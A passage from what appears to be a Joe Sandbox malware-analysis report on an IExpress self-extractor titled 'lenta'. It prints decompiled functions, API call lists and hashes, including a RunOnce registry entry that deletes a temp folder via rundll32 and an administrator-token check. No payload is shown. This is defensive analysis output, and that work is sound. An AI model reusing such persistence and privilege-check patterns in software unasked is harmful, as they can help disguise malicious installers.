						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0xeb88c0; // 0x1d71181
					_t44 = CharPrevA(0xeb88c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0xeb88c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00eb4234
0x00eb423c
0x00eb4240
0x00eb43b2
0x00eb43b7
0x00eb43c0
0x00000000
0x00eb43c5
0x00eb424c
0x00eb4252
0x00eb4257
0x00eb43a4
0x00eb43a5
0x00eb43ab
0x00000000
0x00eb43ab
0x00eb4263
0x00eb4269
0x00eb426e
0x00000000
0x00000000
0x00eb427a
0x00eb4280
0x00eb4285
0x00000000
0x00000000
0x00eb428d
0x00eb4293
0x00eb42e6
0x00eb42e9
0x00eb42ef
0x00eb42f4
0x00eb42f7
0x00eb4300
0x00eb4307
0x00eb430e
0x00eb4315
0x00eb431c
0x00eb4322
0x00eb4326
0x00eb432d
0x00eb432d
0x00eb432f
0x00eb4334
0x00eb4343
0x00eb4349
0x00eb434d
0x00eb4354
0x00eb4354
0x00eb435d
0x00eb436e
0x00eb436e
0x00eb437d
0x00eb4383
0x00eb4387
0x00eb438e
0x00eb438e
0x00eb4387
0x00eb4391
0x00eb4399
0x00000000
0x00eb4295
0x00eb429f
0x00eb42a5
0x00eb42aa
0x00eb42aa
0x00eb42ad
0x00eb42ad
0x00eb42af
0x00eb42b0
0x00eb42b6
0x00eb42c2
0x00eb42c8
0x00eb42ce
0x00eb42e4
0x00eb42e4
0x00000000
0x00eb42ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00EB4236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00EB424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00EB4263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00EB427A
GetTempPathA.KERNEL32(00000104,00EB88C0,?,00000001), ref: 00EB429F
CharPrevA.USER32(00EB88C0,01D71181,?,00000001), ref: 00EB42C2
CharPrevA.USER32(00EB88C0,00000000,?,00000001), ref: 00EB42D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00EB4391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00EB43A5

Strings

SHGetPathFromIDList, xrefs: 00EB4274
SHBrowseForFolder, xrefs: 00EB4246
SHELL32.DLL, xrefs: 00EB422F

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 4dc9b95b0970a89790c82c37fda95e0bba46400b9ea8314726169cf45dbf8cc9
Instruction ID: bba5fc3c86f7afd694f8c6d8e73a6557da8c37f9603a0b6e27ebda6258537b9f
Opcode Fuzzy Hash: 4dc9b95b0970a89790c82c37fda95e0bba46400b9ea8314726169cf45dbf8cc9
Instruction Fuzzy Hash: 1741E6B4A00314AFDB11AF65DD95AEF7BF8EB45348F481269E941B3392CB748C05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00EB44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0xeb8004; // 0x92ae1240
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0xeb8a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0xeb9a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00EB1680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E00EB171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E00EB171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E00EB681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E00EB67C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E00EB681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E00EB67C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00EB6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x00eb44b9
0x00eb44c4
0x00eb44cb
0x00eb44d8
0x00eb44e4
0x00eb44eb
0x00eb44ee
0x00eb44ef
0x00eb44ef
0x00eb44f1
0x00eb44f7
0x00eb44f8
0x00eb467b
0x00eb44fe
0x00eb4509
0x00eb4518
0x00eb4525
0x00eb4562
0x00eb4568
0x00eb4568
0x00eb456b
0x00eb456b
0x00eb456d
0x00eb456e
0x00eb4572
0x00eb4578
0x00eb457c
0x00eb45cb
0x00eb4607
0x00eb4607
0x00eb460d
0x00eb4613
0x00eb4617
0x00000000
0x00eb461d
0x00eb4623
0x00eb4626
0x00eb4628
0x00000000
0x00eb4628
0x00eb45cd
0x00eb45cd
0x00eb45cf
0x00eb45cf
0x00eb45d2
0x00eb45d2
0x00eb45d4
0x00eb45d5
0x00eb45db
0x00eb45de
0x00eb45e3
0x00eb45e9
0x00eb45ed
0x00000000
0x00eb45f3
0x00eb45fd
0x00000000
0x00eb4602
0x00eb45ed
0x00eb457e
0x00eb457e
0x00eb4580
0x00eb4580
0x00eb4583
0x00eb4583
0x00eb4585
0x00eb4586
0x00eb458a
0x00eb458c
0x00eb458f
0x00eb458f
0x00eb4591
0x00eb4592
0x00eb459b
0x00eb459e
0x00eb45a3
0x00eb45a9
0x00eb45ad
0x00000000
0x00eb45af
0x00eb45af
0x00eb45bf
0x00eb462d
0x00eb4630
0x00eb463d
0x00eb464e
0x00eb464e
0x00eb463f
0x00eb4640
0x00eb4647
0x00eb464c
0x00000000
0x00000000
0x00eb464c
0x00eb4666
0x00eb466d
0x00eb466f
0x00eb4675
0x00eb4675
0x00eb45ad
0x00eb4527
0x00eb452e
0x00eb453f
0x00eb453f
0x00eb4530
0x00eb4531
0x00eb4538
0x00eb453d
0x00000000
0x00000000
0x00eb453d
0x00eb4554
0x00eb455a
0x00eb455a
0x00eb455a
0x00eb4525
0x00eb468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554
LocalAlloc.KERNEL32(00000040,00000065), ref: 00EB45A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 00EB45E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 00EB460D
MessageBeep.USER32(00000000), ref: 00EB4630
MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00EB4666
LocalFree.KERNEL32(00000000), ref: 00EB466F

Part of subcall function 00EB681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00EB686E
Part of subcall function 00EB681F: GetSystemMetrics.USER32(0000004A), ref: 00EB68A7
Part of subcall function 00EB681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00EB68CC
Part of subcall function 00EB681F: RegQueryValueExA.ADVAPI32(?,00EB1140,00000000,?,?,0000000C), ref: 00EB68F4
Part of subcall function 00EB681F: RegCloseKey.ADVAPI32(?), ref: 00EB6902

Strings

LoadString() Error. Could not load string resource., xrefs: 00EB44E4
lenta, xrefs: 00EB4545, 00EB465A

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$lenta
API String ID: 3244514340-1000497449
Opcode ID: fabd7ed6b947336effcb8c66b60b3b3b8a55f01d7db12db72a45c569e94ba4f2
Instruction ID: fc000acf9c0d457e8dd295fd01e90655f8760019bc1f2a6c496b448a51296e70
Opcode Fuzzy Hash: fabd7ed6b947336effcb8c66b60b3b3b8a55f01d7db12db72a45c569e94ba4f2
Instruction Fuzzy Hash: D451E3B2901219AFDB219F28DC48BEB7BA9EF45304F0451A5FD49B7286DB319E09CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EB2773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00EB2773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0xeb8004; // 0x92ae1240
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00EB1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E00EB658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E00EB658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0xeb1140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00EB1680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00EB6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00eb2773
0x00eb277e
0x00eb2785
0x00eb278a
0x00eb278d
0x00eb2790
0x00eb2792
0x00eb2798
0x00eb279d
0x00eb28b2
0x00000000
0x00eb27a3
0x00eb27a3
0x00eb27af
0x00eb27c2
0x00eb27c8
0x00eb27cd
0x00eb27d5
0x00eb28b7
0x00eb28b9
0x00000000
0x00eb27db
0x00eb27dd
0x00eb28aa
0x00000000
0x00eb27e3
0x00eb27e3
0x00eb27ec
0x00eb27f8
0x00eb2803
0x00eb280b
0x00eb2831
0x00eb28c3
0x00eb28c9
0x00eb28cd
0x00eb2837
0x00eb285a
0x00eb285c
0x00eb2865
0x00eb2892
0x00eb2895
0x00000000
0x00000000
0x00eb2867
0x00eb2878
0x00eb288c
0x00000000
0x00eb287a
0x00eb2880
0x00eb2885
0x00eb2897
0x00eb2899
0x00eb2899
0x00eb2878
0x00eb2865
0x00eb28a0
0x00eb28bf
0x00eb28c1
0x00000000
0x00000000
0x00eb28c1
0x00eb2831
0x00eb27dd
0x00eb27d5
0x00eb28e5

APIs

CharUpperA.USER32(92AE1240,00000000,00000000,00000000), ref: 00EB27A8
CharNextA.USER32(0000054D), ref: 00EB27B5
CharNextA.USER32(00000000), ref: 00EB27BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2829
RegQueryValueExA.ADVAPI32(?,00EB1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB2870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00EB28A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00EB28AA
GetSystemDirectoryA.KERNEL32 ref: 00EB28B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00EB27E4

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: a483b094d5c9bf3cca2da134f8f18cb52d14f5779df07ab67773522177144b3c
Instruction ID: 4585cb3f5747315a8400724566697252ff60ff62a2a9ff9caf044e19f28f6fbe
Opcode Fuzzy Hash: a483b094d5c9bf3cca2da134f8f18cb52d14f5779df07ab67773522177144b3c
Instruction Fuzzy Hash: B941A2B1A0012CAFDB299B65DC85AFB7BBDEF15700F0450A9F649F2110DB708E858FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EB2267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00EB2267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0xeb8004; // 0x92ae1240
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0xeb8530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E00EB658A( &_v268, 0x104, 0xeb1140);
							}
							_push("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
							E00EB171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00EB6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00eb2272
0x00eb2277
0x00eb2279
0x00eb2283
0x00eb2289
0x00eb22ab
0x00eb22b1
0x00eb22c4
0x00eb22e0
0x00eb22e6
0x00eb22f5
0x00eb230d
0x00eb231c
0x00eb231c
0x00eb2321
0x00eb233a
0x00eb2342
0x00eb2348
0x00eb234b
0x00eb234c
0x00eb234c
0x00eb234e
0x00eb234f
0x00eb236e
0x00eb236e
0x00eb237a
0x00eb2380
0x00eb2380
0x00eb2381
0x00eb2381
0x00eb238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00EB22A3
RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00EB22D8
memset.MSVCRT ref: 00EB22F5
GetSystemDirectoryA.KERNEL32 ref: 00EB2305
RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00EB236E
RegCloseKey.ADVAPI32(?), ref: 00EB237A

Strings

wextract_cleanup0, xrefs: 00EB227C, 00EB22CD, 00EB2363
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB2321
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00EB232D
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00EB2299

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
API String ID: 3027380567-1264114338
Opcode ID: 5ffd9f6e89c422b14609f0107f8841a23423b5993caa2d641586d30261bcb624
Instruction ID: 9fce772b09eff139c667e7843aa8ed19c265e17b1b4a26cfd00912cafb3c605e
Opcode Fuzzy Hash: 5ffd9f6e89c422b14609f0107f8841a23423b5993caa2d641586d30261bcb624
Instruction Fuzzy Hash: 2D31F771A002186BDB31AB21DD49FEB7BBCEF14740F0401E9B64DB6150EA70AF88CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EB3100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00EB3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0xeb8590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0xeb8590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E00EB43D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0xeb8d4c);
					SetWindowTextA(_t33, "lenta");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0xeb88b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E00EB30C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00eb3108
0x00eb310b
0x00eb31b7
0x00eb31ca
0x00eb31d0
0x00eb31d0
0x00eb31da
0x00000000
0x00eb31da
0x00eb3111
0x00eb3114
0x00eb3136
0x00eb3136
0x00eb3138
0x00eb313b
0x00eb3141
0x00000000
0x00eb3143
0x00eb3116
0x00eb311b
0x00eb314b
0x00eb3151
0x00eb3158
0x00eb316a
0x00eb3176
0x00eb317d
0x00eb318b
0x00eb319e
0x00eb31a3
0x00000000
0x00eb31ad
0x00eb3120
0x00000000
0x00000000
0x00eb312a
0x00eb3134
0x00000000
0x00000000
0x00000000
0x00eb3134
0x00eb312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 00EB313B
GetDesktopWindow.USER32 ref: 00EB314B
SetDlgItemTextA.USER32(?,00000834), ref: 00EB316A
SetWindowTextA.USER32(?,lenta), ref: 00EB3176
SetForegroundWindow.USER32(?), ref: 00EB317D
GetDlgItem.USER32(?,00000834), ref: 00EB3185
GetWindowLongA.USER32(00000000,000000FC), ref: 00EB3190
SetWindowLongA.USER32(00000000,000000FC,00EB30C0), ref: 00EB31A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00EB31CA

Strings

lenta, xrefs: 00EB3170

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: lenta
API String ID: 3785188418-2780258678
Opcode ID: 9e1abff3daece18d66403ef5fc139e3431be312bc82f84ecfc8bb6c8eb216e7c
Instruction ID: 94f94af8ea49d38030adeda724f4943726ddfe876bea671599745d31a540c993
Opcode Fuzzy Hash: 9e1abff3daece18d66403ef5fc139e3431be312bc82f84ecfc8bb6c8eb216e7c
Instruction Fuzzy Hash: E5119D31206211BFDB215F39ED0EBDB3AACEB4A725F141720F855B11E0DB719649CA52

Uniqueness

Uniqueness Score: -1.00%

Function 00EB18A3 Relevance: 16.6, APIs: 11, Instructions: 112
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00EB18A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0xeb8004; // 0x92ae1240
				_v8 = _t23 ^ _t53;
				_t25 =  *0xeb8128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00EB6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E00EB17EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0xeb8128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0xeb8128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}

0x00eb18a3
0x00eb18a3
0x00eb18ab
0x00eb18b2
0x00eb18b5
0x00eb18be
0x00eb18c0
0x00eb18c6
0x00eb18c7
0x00eb18ca
0x00eb18cf
0x00eb19c9
0x00eb19d8
0x00eb19d8
0x00eb18df
0x00eb19b8
0x00eb19bd
0x00eb19bf
0x00eb19bf
0x00000000
0x00eb19bd
0x00eb18fa
0x00000000
0x00000000
0x00eb1912
0x00eb19aa
0x00eb19ad
0x00eb19b3
0x00000000
0x00eb1927
0x00eb1927
0x00eb1932
0x00eb1936
0x00eb19a9
0x00eb19a9
0x00000000
0x00eb19a9
0x00eb194c
0x00eb19a2
0x00eb19a3
0x00000000
0x00eb196e
0x00eb1970
0x00eb1999
0x00eb199c
0x00000000
0x00eb199c
0x00eb1972
0x00eb1972
0x00eb1975
0x00eb1984
0x00eb1985
0x00eb198a
0x00000000
0x00000000
0x00000000
0x00eb198c
0x00eb1991
0x00eb1996
0x00000000
0x00eb1996
0x00eb194c

APIs

Part of subcall function 00EB17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00EB18DD), ref: 00EB181A
Part of subcall function 00EB17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00EB182C
Part of subcall function 00EB17EE: AllocateAndInitializeSid.ADVAPI32(00EB18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EB18DD), ref: 00EB1855
Part of subcall function 00EB17EE: FreeSid.ADVAPI32(?,?,?,?,00EB18DD), ref: 00EB1883
